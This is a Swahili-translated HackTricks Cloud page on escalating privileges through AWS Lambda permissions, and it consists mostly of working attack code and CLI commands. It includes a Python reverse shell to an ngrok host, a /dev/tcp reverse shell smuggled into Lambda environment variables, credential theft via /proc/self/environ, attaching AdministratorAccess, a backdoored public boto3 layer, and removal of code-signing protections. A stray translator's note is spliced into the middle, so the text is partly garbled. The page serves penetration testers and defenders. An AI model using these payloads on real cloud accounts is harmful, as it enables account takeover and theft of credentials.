AWS - Lambda Privesc

Reading time: 13 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

lambda

Taarifa zaidi kuhusu lambda katika:

AWS - Lambda Enum

`iam:PassRole`, `lambda:CreateFunction`, (`lambda:InvokeFunction` | `lambda:InvokeFunctionUrl`)

Watumiaji wenye ruhusa za iam:PassRole, lambda:CreateFunction, na lambda:InvokeFunction wanaweza kuinua kiwango cha ruhusa zao.\ Wanaweza kuunda Lambda function mpya na kuiambatanisha na IAM role iliyopo, na kumpa function hiyo ruhusa zinazohusiana na role hiyo. Mtumiaji anaweza kisha kuandika na kupakia code kwenye Lambda function hii (kwa mfano na rev shell).\ Mara function itakapowekwa, mtumiaji anaweza kuamsha utekelezaji wake na vitendo vilivyokusudiwa kwa kuitisha Lambda function kupitia AWS API. Njia hii inamruhusu mtumiaji kutekeleza kazi kwa njia isiyo ya moja kwa moja kupitia Lambda function, akifanya kazi kwa kiwango cha upatikanaji kilichotolewa kwa IAM role inayohusishwa nayo.\

Mshambulizi anaweza kutumia hili kupata rev shell na kuiba token:

rev.py

import socket,subprocess,os,time
def lambda_handler(event, context):
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(('4.tcp.ngrok.io',14305))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(['/bin/sh','-i'])
time.sleep(900)
return 0

bash

# Zip the rev shell
zip "rev.zip" "rev.py"

# Create the function
aws lambda create-function --function-name my_function \
--runtime python3.9 --role <arn_of_lambda_role> \
--handler rev.lambda_handler --zip-file fileb://rev.zip

# Invoke the function
aws lambda invoke --function-name my_function output.txt
## If you have the lambda:InvokeFunctionUrl permission you need to expose the lambda inan URL and execute it via the URL

# List roles
aws iam list-attached-user-policies --user-name <user-name>

Unaweza pia kutumia vibaya ruhusa za role ya lambda kutoka kwenye lambda function yenyewe.
Ikiwa role ya lambda ingekuwa na ruhusa za kutosha ungeweza kuitumia kukupa haki za admin:

python

import boto3
def lambda_handler(event, context):
client = boto3.client('iam')
response = client.attach_user_policy(
UserName='my_username',
PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess'
)
return response

Pia inawezekana ku-leak credentials za role ya lambda bila kuhitaji external connection. Hii itakuwa muhimu kwa Lambdas zilizo katengwa kwa mtandao zinazotumika kwa kazi za ndani. Ikiwa kuna security groups zisizojulikana zinazochuja reverse shells zako, kipande hiki cha code kitakuwezesha ku-leak credentials moja kwa moja kama output ya lambda.

python

def handler(event, context):
sessiontoken = open('/proc/self/environ', "r").read()
return {
'statusCode': 200,
'session': str(sessiontoken)
}

bash

aws lambda invoke --function-name <lambda_name> output.txt
cat output.txt

Athari Inayowezekana: Privesc ya moja kwa moja kwa role yoyote ya huduma ya lambda iliyotajwa.

caution

Kumbuka kwamba hata kama inaweza kuonekana kuvutia lambda:InvokeAsync, haitaruhusu peke yake kuendesha aws lambda invoke-async; pia unahitaji lambda:InvokeFunction

`iam:PassRole`, `lambda:CreateFunction`, `lambda:AddPermission`

Kama katika tukio lililopita, unaweza kujipa ruhusa ya lambda:InvokeFunction ikiwa una ruhusa lambda:AddPermission

bash

# Check the previous exploit and use the following line to grant you the invoke permissions
aws --profile "$NON_PRIV_PROFILE_USER" lambda add-permission --function-name my_function \
--action lambda:InvokeFunction --statement-id statement_privesc --principal "$NON_PRIV_PROFILE_USER_ARN"

Potential Impact: Direct privesc kwa role yoyote ya lambda service iliyotajwa.

`iam:PassRole`, `lambda:CreateFunction`, `lambda:CreateEventSourceMapping`

Watumiaji walio na ruhusa iam:PassRole, lambda:CreateFunction, na lambda:CreateEventSourceMapping (na pengine dynamodb:PutItem na dynamodb:CreateTable) wanaweza kwa njia isiyo ya moja kwa moja escalate privileges hata bila lambda:InvokeFunction.
Wanaweza kuunda Lambda function yenye malicious code na kuipa IAM role iliyopo.

Badala ya kuiita Lambda moja kwa moja, mtumiaji anaweka au anatumia jedwali la DynamoDB lililopo, akiulianisha na Lambda kupitia event source mapping. Mipangilio hii inahakikisha Lambda function inachochewa kiotomatiki mara kipengee kipya kinaingizwa kwenye jedwali, iwe kwa hatua ya mtumiaji au mchakato mwingine, na hivyo kuitisha kwa njia isiyo ya moja kwa moja Lambda function na kutekeleza code kwa ruhusa za IAM role iliyotumwa.

bash

aws lambda create-function --function-name my_function \
--runtime python3.8 --role <arn_of_lambda_role> \
--handler lambda_function.lambda_handler \
--zip-file fileb://rev.zip

Ikiwa DynamoDB tayari inafanya kazi katika mazingira ya AWS, mtumiaji anahitaji tu kuanzisha event source mapping kwa Lambda function. Hata hivyo, ikiwa DynamoDB haisitumiki, mtumiaji lazima aunde jedwali jipya lenye streaming imewezeshwa:

bash

aws dynamodb create-table --table-name my_table \
--attribute-definitions AttributeName=Test,AttributeType=S \
--key-schema AttributeName=Test,KeyType=HASH \
--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
--stream-specification StreamEnabled=true,StreamViewType=NEW_AND_OLD_IMAGES

Sasa inawezekana kuunganisha Lambda function na jedwali la DynamoDB kwa kuunda event source mapping:

bash

aws lambda create-event-source-mapping --function-name my_function \
--event-source-arn <arn_of_dynamodb_table_stream> \
--enabled --starting-position LATEST

Kwa kuwa kazi ya Lambda imeunganishwa na stream ya DynamoDB, mshambuliaji anaweza kuanzisha Lambda kwa njia isiyo ya moja kwa moja kwa kuamsha stream ya DynamoDB. Hii inaweza kufanyika kwa kuingiza kipengee kwenye jedwali la DynamoDB:

bash

aws dynamodb put-item --table-name my_table \
--item Test={S="Random string"}

Athari Inayowezekana: Privesc ya moja kwa moja kwa lambda service role iliyotajwa.

`lambda:AddPermission`

Mshambuliaji mwenye ruhusa hii anaweza kujipa (au kuwapa wengine) ruhusa yoyote (hii inazalisha resource based policies za kuipa ufikiaji rasilimali):

bash

# Give yourself all permissions (you could specify granular such as lambda:InvokeFunction or lambda:UpdateFunctionCode)
aws lambda add-permission --function-name <func_name> --statement-id asdasd --action '*' --principal arn:<your user arn>

# Invoke the function
aws lambda invoke --function-name <func_name> /tmp/outout

Athari Inayoweza Kutokea: Privesc ya moja kwa moja kwa cheo cha huduma cha lambda kwa kumpa ruhusa ya kubadilisha code na kuendesha.

`lambda:AddLayerVersionPermission`

Mshambuliaji mwenye ruhusa hii anaweza kumpa yeye mwenyewe (au wengine) ruhusa lambda:GetLayerVersion. Anaweza kupata layer na kutafuta udhaifu au taarifa nyeti

bash

# Give everyone the permission lambda:GetLayerVersion
aws lambda add-layer-version-permission --layer-name ExternalBackdoor --statement-id xaccount --version-number 1 --principal '*' --action lambda:GetLayerVersion

Athari Inayoweza Kutokea: Ufikiaji unaowezekana wa taarifa nyeti.

`lambda:UpdateFunctionCode`

Watumiaji wanaomiliki ruhusa ya lambda:UpdateFunctionCode wanaweza kubadilisha msimbo wa Lambda uliopo uliounganishwa na IAM role.
Mshambuliaji anaweza kubadilisha msimbo wa Lambda ili exfiltrate the IAM credentials.

Ingawa mshambuliaji anaweza asiwe na uwezo wa moja kwa moja wa kuitisha Lambda function, ikiwa Lambda function tayari ipo na inafanya kazi, kuna uwezekano itachochewa kupitia workflows au events zilizopo, hivyo kwa njia isiyo ya moja kwa moja kuwezesha utekelezaji wa msimbo uliobadilishwa.

bash

# The zip should contain the lambda code (trick: Download the current one and add your code there)
aws lambda update-function-code --function-name target_function \
--zip-file fileb:///my/lambda/code/zipped.zip

# If you have invoke permissions:
aws lambda invoke --function-name my_function output.txt

# If not check if it's exposed in any URL or via an API gateway you could access

Athari Zinazoweza Kutokea: Privesc ya moja kwa moja kwa lambda service role inayotumika.

`lambda:UpdateFunctionConfiguration`

RCE kupitia env variables

Kwa ruhusa hizi inawezekana kuongeza environment variables ambazo zitasababisha Lambda kutekeleza arbitrary code. Kwa mfano, katika python inawezekana kutumia vibaya environment variables PYTHONWARNING na BROWSER ili kufanya mchakato wa python kutekeleza amri yoyote:

bash

aws --profile none-priv lambda update-function-configuration --function-name <func-name> --environment "Variables={PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=\"/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/18755 0>&1' & #%s\"}"

Kwa lugha nyingine za scripting kuna env variables nyingine unazoweza kutumia. Kwa habari zaidi angalia sehemu ndogo za scripting languages katika:

macOS Process Abuse - HackTricks

RCE via Lambda Layers

Lambda Layers inaruhusu kujumuisha code katika yako lamdba function lakini kuihifadhi kando, hivyo function code inaweza kubaki ndogo na several functions can share code.

Ndani ya lambda unaweza kuangalia paths kutoka ambapo python code inapakiwa kwa function kama ifuatayo:

python

import json
import sys

def lambda_handler(event, context):
print(json.dumps(sys.path, indent=2))

Haya ni maeneo:

/var/task
/opt/python/lib/python3.7/site-packages
/opt/python
/var/runtime
/var/lang/lib/python37.zip
/var/lang/lib/python3.7
/var/lang/lib/python3.7/lib-dynload
/var/lang/lib/python3.7/site-packages
/opt/python/lib/python3.7/site-packages
/opt/python

Kwa mfano, maktaba boto3 inachomwa kutoka /var/runtime/boto3 (nafasi ya 4).

Exploitation

Inawezekana kutumia vibaya ruhusa lambda:UpdateFunctionConfiguration ili kuongeza layer mpya kwa lambda function. Ili kutekeleza msimbo wowote layer hii inahitaji kuwa na baadhi ya maktaba ambayo lambda itakayoi-import. Ikiwa unaweza kusoma msimbo wa lambda, unaweza kupata hili kwa urahisi; pia angalia kwamba inawezekana lambda tayari inatumia layer na unaweza kupakua layer hiyo na kuongeza msimbo wako ndani yake.

Kwa mfano, tukikisia kwamba lambda inatumia maktaba boto3, hii itaunda layer ya ndani yenye toleo la mwisho la maktaba:

bash

pip3 install -t ./lambda_layer boto3

Unaweza kufungua ./lambda_layer/boto3/__init__.py na add the backdoor in the global code (a function to exfiltrate credentials or get a reverse shell for example).

Kisha, zip katalogi hiyo ./lambda_layer na upload the new lambda layer kwenye account yako mwenyewe (au kwenye akaunti ya waathiriwa, lakini huenda huna idhinisho za kufanya hivyo).
Kumbuka kwamba unahitaji kuunda python folder na kuweka libraries huko ili ku-override /opt/python/boto3. Pia, layer inapaswa kuwa compatible with the python version inayotumika na lambda na kama utaipakia kwenye account yako, inapaswa kuwa katika same region:

bash

aws lambda publish-layer-version --layer-name "boto3" --zip-file file://backdoor.zip --compatible-architectures "x86_64" "arm64" --compatible-runtimes "python3.9" "python3.8" "python3.7" "python3.6"

Sasa, fanya lambda layer iliyopakiwa iwe inapatikana kwa akaunti yoyote:

bash

aws lambda add-layer-version-permission --layer-name boto3 \
--version-number 1 --statement-id public \
--action lambda:GetLayerVersion --principal *

Na ambatisha lambda layer kwa victim lambda function:

bash

aws lambda update-function-configuration \
--function-name <func-name> \
--layers arn:aws:lambda:<region>:<attacker-account-id>:layer:boto3:1 \
--timeout 300 #5min for rev shells

Hatua inayofuata itakuwa au invoke the function wenyewe ikiwa tunaweza au kusubiri hadi it gets invoked kwa njia za kawaida–ambayo ni njia salama zaidi.

A more stealth way to exploit this vulnerability inaweza kupatikana katika:

AWS - Lambda Layers Persistence

Athari Inayoweza Kutokea: Direct privesc to the lambda service role used.

`iam:PassRole`, `lambda:CreateFunction`, `lambda:CreateFunctionUrlConfig`, `lambda:InvokeFunctionUrl`

Labda kwa permissions hizo utaweza kuunda function na kuiendesha kwa kuitumia URL... lakini sikuweza kupata njia ya kuipima, hivyo nijulishe ukifaulu!

Lambda MitM

Baadhi ya lambdas zitakuwa zikipokea taarifa zenye nyeti kutoka kwa watumiaji kama parameters. Ikiwa utapata RCE kwenye moja yao, unaweza exfiltrate taarifa ambazo watumiaji wengine wanazituma kwa hiyo, angalia katika:

AWS - Lambda Steal Requests

Marejeo

`lambda:DeleteFunctionCodeSigningConfig` or `lambda:PutFunctionCodeSigningConfig` + `lambda:UpdateFunctionCode` — Bypass Lambda Code Signing

Ikiwa Lambda function inalazimisha code signing, mshambuliaji anayeweza kuondoa Code Signing Config (CSC) au kuipunguza hadi Warn anaweza kupeleka unsigned code kwenye function. Hii inavuka ulinzi wa uadilifu bila kubadilisha function's IAM role au triggers.

Permissions (one of):

Path A: lambda:DeleteFunctionCodeSigningConfig, lambda:UpdateFunctionCode
Path B: lambda:CreateCodeSigningConfig, lambda:PutFunctionCodeSigningConfig, lambda:UpdateFunctionCode

Notes:

Kwa Path B, hutaji AWS Signer profile ikiwa sera ya CSC imewekwa WARN (unsigned artifacts allowed).

Hatua (REGION=us-east-1, TARGET_FN=):

Tayarisha payload ndogo:

bash

cat > handler.py <<'PY'
import os, json
def lambda_handler(event, context):
return {"pwn": True, "env": list(os.environ)[:6]}
PY
zip backdoor.zip handler.py

Njia A) Ondoa CSC kisha sasisha code:

bash

aws lambda get-function-code-signing-config --function-name $TARGET_FN --region $REGION && HAS_CSC=1 || HAS_CSC=0
if [ "$HAS_CSC" -eq 1 ]; then
aws lambda delete-function-code-signing-config --function-name $TARGET_FN --region $REGION
fi
aws lambda update-function-code --function-name $TARGET_FN --zip-file fileb://backdoor.zip --region $REGION
# If the handler name changed, also run:
aws lambda update-function-configuration --function-name $TARGET_FN --handler handler.lambda_handler --region $REGION

Njia B) Punguza hadi Warn na sasisha msimbo (ikiwa kufuta hakuruhusiwi):

bash

CSC_ARN=$(aws lambda create-code-signing-config \
--description ht-warn-csc \
--code-signing-policies UntrustedArtifactOnDeployment=WARN \
--query CodeSigningConfig.CodeSigningConfigArn --output text --region $REGION)
aws lambda put-function-code-signing-config --function-name $TARGET_FN --code-signing-config-arn $CSC_ARN --region $REGION
aws lambda update-function-code --function-name $TARGET_FN --zip-file fileb://backdoor.zip --region $REGION
# If the handler name changed, also run:
aws lambda update-function-configuration --function-name $TARGET_FN --handler handler.lambda_handler --region $REGION

Imethibitishwa. Nitatafsiri maandishi ya Kiingereza katika src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc/README.md hadi Kiswahili. Nitahifadhi kabisa sintaksia ya markdown/html, code, majina ya hacking, majina ya cloud/SaaS (mfano: aws, gcp, Workspace), viungo, paths na tags ({#...}) bila kutafsiri. Sitatoa maudhui ya ziada yasiyo kwenye faili.

bash

aws lambda invoke --function-name $TARGET_FN /tmp/out.json --region $REGION >/dev/null
cat /tmp/out.json

Athari inayoweza kutokea: Uwezo wa kusukuma na kuendesha msimbo wowote usiosainishwa kwenye function iliyotarajiwa kulazimisha deployments zilizosainishwa, na hivyo kuweza kusababisha utekelezaji wa msimbo kwa ruhusa za role ya function.

Usafishaji:

bash

aws lambda delete-function-code-signing-config --function-name $TARGET_FN --region $REGION || true

tip

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

HackTricks Cloud